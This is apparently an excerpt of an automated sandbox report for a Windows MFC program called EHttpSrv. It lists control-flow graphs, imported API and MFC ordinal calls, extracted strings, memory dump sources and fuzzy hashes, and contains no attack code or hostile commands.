                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e9b7770267b3d5b48ccefccea6582f5a03e6425513fd26b549b964dc6858191
                                                                                                                • Instruction ID: 073012663a3370ed39832b2886ff9c91f14f0fb60ba6ce6617fc78564014522d
                                                                                                                • Opcode Fuzzy Hash: 2e9b7770267b3d5b48ccefccea6582f5a03e6425513fd26b549b964dc6858191
                                                                                                                • Instruction Fuzzy Hash: 53D0A732420560CFC7108F58E440541B3F0FF84620B068C7DE48567921D334BC80CB80

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 851 20464370-204643f0 #310 * 2 852 204643f2-204643fb #776 851->852 853 20464400-20464426 #5149 ExpandEnvironmentStringsW 851->853 854 20464776-204647b7 #578 * 2 852->854 855 20464431-20464433 853->855 856 20464428 853->856 859 204647b9 call 20478952 854->859 857 20464497-204644a5 #5398 855->857 858 20464435-2046443d 855->858 856->855 860 204644a7-204644a9 857->860 861 204644ab-204644b0 #776 857->861 862 20464454-20464456 858->862 863 2046443f-20464441 858->863 864 204647be-204647c4 859->864 860->861 865 204644b6-204644dd #2461 GetShortPathNameW 860->865 861->865 867 2046445b call 2043bde0 862->867 866 20464446 call 2043bde0 863->866 868 204644e3-204644fc #2461 wcsncmp 865->868 869 2046457e-20464584 865->869 870 2046444b-20464450 866->870 871 20464460 867->871 872 20464586-20464592 #2461 868->872 873 20464502-2046451d #2461 _wcsicmp 868->873 869->872 876 204645e5-204645fa wcsstr 869->876 874 20464452 870->874 875 20464463 870->875 871->875 879 20464595-2046459e 872->879 873->872 877 2046451f-2046457c #310 #776 #896 #2461 GetShortPathNameW #578 873->877 878 20464465-2046446b 874->878 875->878 880 204645fc-20464602 876->880 881 20464628-2046464b #5149 876->881 877->869 877->872 878->857 883 2046446d-20464495 #5398 #5149 call 2043c3a0 878->883 879->879 882 204645a0-204645aa 879->882 880->881 884 20464604-2046460d 880->884 891 20464724-20464726 881->891 892 20464651-2046466a #2461 wcsncmp 881->892 887 204645c2-204645db wcsncpy_s 882->887 888 204645ac-204645c0 wcscpy_s 882->888 883->857 884->881 885 2046460f-2046461a 884->885 885->881 890 2046461c-20464620 885->890 887->876 888->876 890->881 896 20464622-20464625 890->896 894 2046474c-2046475a #5398 891->894 895 20464728-2046474a #5398 #5149 891->895 892->894 897 20464670-2046468b #2461 _wcsicmp 892->897 898 20464767-2046476b 894->898 899 2046475c-2046475e 894->899 895->894 896->881 897->894 900 20464691-204646ea #310 #5398 #776 #899 #5149 #2461 897->900 903 2046476c-20464770 #774 898->903 899->898 902 20464760-20464765 899->902 905 20464710-20464722 #578 900->905 906 204646ec-2046470e #5398 #5149 900->906 902->903 903->854 905->894 906->905
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2461$#310#578#776$#5149#5398NamePathShort$#896EnvironmentExpandStrings_wcsicmpwcsncmp
                                                                                                                • String ID: \\?\$system
                                                                                                                • API String ID: 4018035189-175627492
                                                                                                                • Opcode ID: a074a2f78dff0d93a8659069b863debc981802d3ff8d68cffb1b4b2f6dede247
                                                                                                                • Instruction ID: fb7a9633b7aa5802037cce5318f5ab08ddcb74c0a92cf58fb4973bae68b118f5
                                                                                                                • Opcode Fuzzy Hash: a074a2f78dff0d93a8659069b863debc981802d3ff8d68cffb1b4b2f6dede247
                                                                                                                • Instruction Fuzzy Hash: 77C197715087019BC710EF90CCC9B9A77E4FF94716F40892CFA52922A5EF7C9A44CB92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 999 2041be00-2041bea2 #310 * 2 #4026 #896 #900 1000 2041bea4-2041beb4 #4026 999->1000 1001 2041beb6-2041bec1 #776 999->1001 1002 2041bec2-2041bedf #896 #900 1000->1002 1001->1002 1003 2041bee1-2041bf25 #4026 #896 #776 #896 #900 1002->1003 1004 2041bf2b-2041bf6f #4026 #896 #900 1002->1004 1003->1004 1005 2041bf71-2041bf89 #4026 #896 1004->1005 1006 2041bf8f-2041bf96 1004->1006 1005->1006 1007 2041bf98-2041bf9e 1006->1007 1008 2041c00d-2041c012 1006->1008 1011 2041bfa0-2041bfa2 1007->1011 1009 2041c073-2041c078 1008->1009 1010 2041c014-2041c071 call 2041e0f0 #899 #900 #899 #900 1008->1010 1013 2041c07a 1009->1013 1014 2041c0df-2041c0e6 1009->1014 1010->1009 1015 2041c281-2041c29d #1176 #4347 1011->1015 1016 2041bfa8-2041bfab 1011->1016 1018 2041c080-2041c0dd call 2041e1b0 #899 #900 #899 #900 1013->1018 1019 2041c160-2041c165 1014->1019 1020 2041c0e8-2041c0ea 1014->1020 1021 2041c2a7-2041c2ad 1015->1021 1022 2041c29f-2041c2a3 1015->1022 1016->1015 1023 2041bfb1-2041bfe1 _snwprintf_s 1016->1023 1018->1014 1024 2041c223-2041c271 #6063 #578 * 2 1019->1024 1025 2041c16b-2041c171 1019->1025 1027 2041c0f0-2041c0f2 1020->1027 1028 2041c2b7 1021->1028 1029 2041c2af-2041c2b3 1021->1029 1022->1021 1023->1015 1030 2041bfe7-2041c00b #899 #900 1023->1030 1033 2041c273 call 20478952 1024->1033 1031 2041c173-2041c175 1025->1031 1027->1015 1034 2041c0f8-2041c0fb 1027->1034 1029->1028 1030->1008 1030->1011 1031->1015 1035 2041c17b-2041c17e 1031->1035 1036 2041c278-2041c27e 1033->1036 1034->1015 1037 2041c101-2041c15e call 20406540 #899 #900 1034->1037 1035->1015 1038 2041c184-2041c1c4 call 20406540 1035->1038 1037->1019 1037->1027 1038->1015 1043 2041c1ca-2041c21d #2311 #896 1038->1043 1043->1024 1043->1031
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #900$#896$#899$#4026$_snwprintf_s$#310#578#776$#1176#2311#4347#6063
                                                                                                                • String ID: - $ / $%d.%d.%d.%d$%ls / %d;
                                                                                                                • API String ID: 428142261-2105336867
                                                                                                                • Opcode ID: ac90e034d3ae0310e7a85c5f209786e44ff2bca9ce7db78bb364263f96657bb2
                                                                                                                • Instruction ID: 90043ed17399e709728619cef2eeb1962bfa68706d0e13c2d55a6fd07870de37
                                                                                                                • Opcode Fuzzy Hash: ac90e034d3ae0310e7a85c5f209786e44ff2bca9ce7db78bb364263f96657bb2
                                                                                                                • Instruction Fuzzy Hash: 16E139715087019FC314DF94CC84A9AB7F5FF98709F008D2DF586976A0EB38AA49DB62

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1044 204437e0-20443838 #310 call 204786b7 #314 1047 2044383e-20443842 1044->1047 1048 20443c68-20443c73 1044->1048 1047->1048 1049 20443848-2044384e 1047->1049 1050 20443c75-20443c79 1048->1050 1051 20443c7c-20443c81 1048->1051 1052 20443854-20443857 1049->1052 1053 20443a4d-20443a6f 1049->1053 1050->1051 1054 20443c83-20443c8a #6751 1051->1054 1055 20443c8f-20443cb5 #578 1051->1055 1056 20443907-2044390d 1052->1056 1057 2044385d-20443860 1052->1057 1058 20443a75-20443a78 1053->1058 1059 20443bae-20443c0a #2310 #4026 * 2 call 20444320 #896 1053->1059 1054->1055 1060 20443a05-20443a25 #776 * 2 1056->1060 1061 20443913 1056->1061 1062 20443875-20443880 1057->1062 1063 20443862-20443870 call 2042e670 1057->1063 1065 20443b0d-20443bac #2310 #4026 * 2 call 20444320 #896 #578 #4026 call 20444320 #896 1058->1065 1066 20443a7e-20443a81 1058->1066 1082 20443c0e #578 1059->1082 1075 20443a2b-20443a48 #5149 * 2 1060->1075 1068 204439d7-20443a03 #2310 #4026 1061->1068 1069 20443978-204439a4 #2310 #4026 1061->1069 1070 204439a9-204439d5 #2310 #4026 1061->1070 1071 20443949-20443973 #2310 #4026 1061->1071 1072 2044391a-20443944 #2310 #4026 1061->1072 1076 204438c1-204438cf #2310 1062->1076 1077 20443882-20443888 1062->1077 1063->1055 1065->1082 1078 20443a83-20443aa3 #4026 #776 1066->1078 1079 20443aa8-20443b08 #2310 #4026 * 2 call 20444320 #896 1066->1079 1068->1075 1069->1075 1070->1075 1071->1075 1072->1075 1086 20443c31-20443c65 call 2042e670 #578 1075->1086 1085 204438d2-204438df #4026 1076->1085 1083 2044389f-204438bf #776 * 2 1077->1083 1084 2044388a-2044389d #2310 1077->1084 1087 20443c14-20443c2e #5149 * 2 1078->1087 1079->1082 1082->1087 1091 204438e5-20443902 #5149 * 2 1083->1091 1084->1085 1085->1091 1087->1086 1091->1086
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20443812
                                                                                                                • #314.MFC80U(00000000), ref: 2044382A
                                                                                                                • #2310.MFC80U(?,00000248,00000008,00000009,00000000), ref: 20443894
                                                                                                                • #4026.MFC80U(0000020C), ref: 204438DF
                                                                                                                • #5149.MFC80U(00000000), ref: 204438E9
                                                                                                                • #5149.MFC80U(00000000), ref: 204438F9
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • #4026.MFC80U(00000243,00000000), ref: 20443A8A
                                                                                                                • #776.MFC80U(20485878), ref: 20443A9D
                                                                                                                • #5149.MFC80U(00000000), ref: 20443C18
                                                                                                                • #5149.MFC80U(00000000), ref: 20443C28
                                                                                                                • #578.MFC80U ref: 20443C4B
                                                                                                                • #6751.MFC80U(00000000,?,00000000), ref: 20443C8A
                                                                                                                • #578.MFC80U(00000000), ref: 20443C9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5149$#4026#578#6751$#2310#310#314#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 1553475692-0
                                                                                                                • Opcode ID: f04ab54d33e1be9fd4d368078cb38f950faa0191a76b32507f1d95f43eafd0ab
                                                                                                                • Instruction ID: 5715c73cd8d1d2426d1206603505d36170ae64b3e8ce92e60f464c4ad07a69a9
                                                                                                                • Opcode Fuzzy Hash: f04ab54d33e1be9fd4d368078cb38f950faa0191a76b32507f1d95f43eafd0ab
                                                                                                                • Instruction Fuzzy Hash: 3EC1C671A48740ABE704EF94DCCDB5D77A0FB44B0AF04892CFA42A62D1DF799908DB52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1095 20452110-2045211f 1097 20452125-20452129 1095->1097 1098 204522af-204522b7 1095->1098 1101 20452138 1097->1101 1102 2045212b-20452132 1097->1102 1099 204522bd-204522c3 1098->1099 1100 2045233f #1176 1098->1100 1099->1100 1103 204522c5-204522e5 SendMessageW 1099->1103 1104 20452344-20452349 1100->1104 1106 2045213a-204521a8 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 1101->1106 1102->1101 1105 20452134-20452136 1102->1105 1103->1104 1107 204522e7-20452325 #2651 #2155 #2651 #2155 #2651 #2155 1103->1107 1108 20452375-204523b6 #2651 #2155 #2651 #2155 #2651 #2155 1104->1108 1109 2045234b-20452353 1104->1109 1105->1106 1110 204521dc-204522a9 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 #2651 #2155 1106->1110 1111 204521aa-204521b2 1106->1111 1113 20452327-20452335 #2651 #2155 1107->1113 1108->1113 1109->1100 1114 20452355-2045235b 1109->1114 1110->1098 1112 2045233a-2045233c 1110->1112 1111->1110 1115 204521b4-204521bc 1111->1115 1113->1112 1114->1100 1116 2045235d-20452372 1114->1116 1115->1100 1117 204521c2-204521c5 1115->1117 1116->1108 1117->1100 1118 204521cb-204521d8 1117->1118 1118->1110 1119 204521da 1118->1119 1119->1110
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(000004D8,00000000), ref: 20452145
                                                                                                                • #2155.MFC80U(000004D8,00000000), ref: 2045214C
                                                                                                                • #2651.MFC80U(000003EE,00000000,000004D8,00000000), ref: 20452159
                                                                                                                • #2155.MFC80U(000003EE,00000000,000004D8,00000000), ref: 20452160
                                                                                                                • #2651.MFC80U(000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 2045216D
                                                                                                                • #2155.MFC80U(000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452174
                                                                                                                • #2651.MFC80U(00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452181
                                                                                                                • #2155.MFC80U(00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452188
                                                                                                                • #2651.MFC80U(0000050A,00000000,00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 20452195
                                                                                                                • #2155.MFC80U(0000050A,00000000,00000504,00000000,000004D0,00000000,000003EE,00000000,000004D8,00000000), ref: 2045219C
                                                                                                                • #2651.MFC80U(00000505,00000000), ref: 204521E7
                                                                                                                • #2155.MFC80U(00000505,00000000), ref: 204521EE
                                                                                                                • #2651.MFC80U(000004D9,00000000,00000505,00000000), ref: 204521FB
                                                                                                                • #2155.MFC80U(000004D9,00000000,00000505,00000000), ref: 20452202
                                                                                                                • #2651.MFC80U(00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045220F
                                                                                                                • #2155.MFC80U(00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452216
                                                                                                                • #2651.MFC80U(000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452223
                                                                                                                • #2155.MFC80U(000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045222A
                                                                                                                • #2651.MFC80U(00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452237
                                                                                                                • #2155.MFC80U(00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045223E
                                                                                                                • #2651.MFC80U(0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045224B
                                                                                                                • #2155.MFC80U(0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452252
                                                                                                                • #2651.MFC80U(00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045225F
                                                                                                                • #2155.MFC80U(00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452266
                                                                                                                • #2651.MFC80U(000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 20452273
                                                                                                                • #2155.MFC80U(000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000,00000505,00000000), ref: 2045227A
                                                                                                                • #2651.MFC80U(000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000), ref: 20452287
                                                                                                                • #2155.MFC80U(000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000,000004D9,00000000), ref: 2045228E
                                                                                                                • #2651.MFC80U(000003F8,00000000,000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000), ref: 2045229B
                                                                                                                • #2155.MFC80U(000003F8,00000000,000003F7,00000000,000004D4,00000000,00000499,00000000,0000049A,00000000,00000428,00000000,000004BF,00000000,00000509,00000000), ref: 204522A2
                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 204522E1
                                                                                                                • #2651.MFC80U(00000499,00000000,?,2045120B,00000001,00000000), ref: 204522EF
                                                                                                                • #2155.MFC80U(00000499,00000000,?,2045120B,00000001,00000000), ref: 204522F6
                                                                                                                • #2651.MFC80U(0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 20452304
                                                                                                                • #2155.MFC80U(0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 2045230B
                                                                                                                • #2651.MFC80U(000003F7,00000000,0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 20452319
                                                                                                                • #2155.MFC80U(000003F7,00000000,0000049A,00000000,00000499,00000000,?,2045120B,00000001,00000000), ref: 20452320
                                                                                                                • #2651.MFC80U(000004D4,00000001,000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 2045232E
                                                                                                                • #2155.MFC80U(000004D4,00000001,000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 20452335
                                                                                                                • #1176.MFC80U(?,2045120B,00000001,00000000), ref: 2045233F
                                                                                                                • #2651.MFC80U(00000499,00000001,?,2045120B,00000001,00000000), ref: 2045237E
                                                                                                                • #2155.MFC80U(00000499,00000001,?,2045120B,00000001,00000000), ref: 20452385
                                                                                                                • #2651.MFC80U(0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 20452393
                                                                                                                • #2155.MFC80U(0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 2045239A
                                                                                                                • #2651.MFC80U(000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 204523A8
                                                                                                                • #2155.MFC80U(000003F7,00000001,0000049A,00000001,00000499,00000001,?,2045120B,00000001,00000000), ref: 204523AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#1176MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3597693756-0
                                                                                                                • Opcode ID: bc34519fbc58735ceab56caef8684ec06317434b7573c2e777f47df328bb0116
                                                                                                                • Instruction ID: 5b3ee57f764aaf6637235102a7c02bb01dbd315285f2a9fc9a3a034b04cf5d66
                                                                                                                • Opcode Fuzzy Hash: bc34519fbc58735ceab56caef8684ec06317434b7573c2e777f47df328bb0116
                                                                                                                • Instruction Fuzzy Hash: 4F514070380741AAD91657B14C66FBF26AA8BE2F08F80C52DB6416FAE0CE7C9D03C745
                                                                                                                APIs
                                                                                                                • #4112.MFC80U(00000000,00000400,00000000), ref: 20426994
                                                                                                                • SendMessageW.USER32(?,00000474,00000000,00000000), ref: 204269C4
                                                                                                                • #2366.MFC80U(00000000), ref: 204269C7
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204269DB
                                                                                                                • #5609.MFC80U(?), ref: 204269E4
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204269F2
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001), ref: 20426A17
                                                                                                                • #5609.MFC80U(?,?,?,?,?,00000001), ref: 20426A23
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20426A34
                                                                                                                • #5609.MFC80U(?), ref: 20426A3D
                                                                                                                • #762.MFC80U(00000054,?), ref: 20426A66
                                                                                                                • #1545.MFC80U(50800844,?,?,00000003), ref: 20426AA9
                                                                                                                • #6086.MFC80U(00000000,50800844,?,?,00000003), ref: 20426AB5
                                                                                                                • #2651.MFC80U(00000001,00000000,50800844,?,?,00000003), ref: 20426ACE
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20426ADB
                                                                                                                • #2362.MFC80U(00000000,?,00000003), ref: 20426ADE
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20426AFD
                                                                                                                • #762.MFC80U(000000DC,?,00000003), ref: 20426B04
                                                                                                                • #1562.MFC80U(50804005,?,?,00000004), ref: 20426B49
                                                                                                                • memset.MSVCR80 ref: 20426BAD
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20426BC5
                                                                                                                • #2362.MFC80U(00000000), ref: 20426BC8
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20426BDB
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 20426BEF
                                                                                                                • #1271.MFC80U(00000000), ref: 20426BF8
                                                                                                                • CreateFontIndirectW.GDI32 ref: 20426C16
                                                                                                                • #1271.MFC80U(00000000), ref: 20426C1F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#5609RectWindow$#1271#2362#762CreateFontIndirect$#1545#1562#2366#2651#4112#4119#6086Objectmemset
                                                                                                                • String ID: Column 0$n
                                                                                                                • API String ID: 1214218300-1629151783
                                                                                                                • Opcode ID: 849847efee924b196100a539a41ceb1258c5fa91bf222e3bd34c776a2636ad2f
                                                                                                                • Instruction ID: bedc3ba552ba0a2bd24c9c4beb38efaea4eda69a7990d98176306c8c26aa3678
                                                                                                                • Opcode Fuzzy Hash: 849847efee924b196100a539a41ceb1258c5fa91bf222e3bd34c776a2636ad2f
                                                                                                                • Instruction Fuzzy Hash: 76C152B16047409FD724CBB4CC85FEBB7E9BB98B04F108A1DF19997290DBB9A9018B51
                                                                                                                APIs
                                                                                                                • #4577.MFC80U(FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD67
                                                                                                                • #4112.MFC80U(00000000,00000400,00000000,FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD77
                                                                                                                • #6063.MFC80U(?,00000000,00000400,00000000,FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD85
                                                                                                                • #310.MFC80U(?,00000000,00000400,00000000,FEEA6C22,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DD8E
                                                                                                                • #2651.MFC80U(00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDA0
                                                                                                                • #776.MFC80U(?,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDB6
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDC9
                                                                                                                • #2651.MFC80U(00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDD2
                                                                                                                • #776.MFC80U(?,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDE8
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DDFB
                                                                                                                • #2651.MFC80U(00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE07
                                                                                                                • #776.MFC80U(?,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE1D
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE30
                                                                                                                • #2651.MFC80U(00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE3C
                                                                                                                • #776.MFC80U(?,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE52
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE65
                                                                                                                • #2651.MFC80U(00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE71
                                                                                                                • #776.MFC80U(?,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE87
                                                                                                                • #6063.MFC80U(?,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042DE9A
                                                                                                                • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042DED5
                                                                                                                • #2651.MFC80U(00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042DEDF
                                                                                                                • #776.MFC80U(?,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9), ref: 2042DEF5
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF0D
                                                                                                                • #2651.MFC80U(00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9), ref: 2042DF16
                                                                                                                • #776.MFC80U(?,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?), ref: 2042DF2C
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF44
                                                                                                                • #2651.MFC80U(00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?), ref: 2042DF50
                                                                                                                • #776.MFC80U(?,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF66
